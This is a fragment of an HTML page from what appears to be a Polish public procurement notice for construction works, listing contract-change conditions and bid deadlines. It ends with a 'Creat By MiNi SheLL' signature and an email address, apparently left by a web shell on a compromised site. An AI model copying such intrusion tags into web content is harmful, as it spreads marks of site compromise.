teleadresowych Stron umowy określonych w umowie; - oznaczenia<br/>danych dotyczących Zamawiającego i/lub Wykonawcy; - zmiana rachunku bankowego<br/>Wykonawcy; - w przypadku zmian korzystnych dla zamawiającego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-12 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://starostwo.pzp.kozienicepowiat.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-12 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-24 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com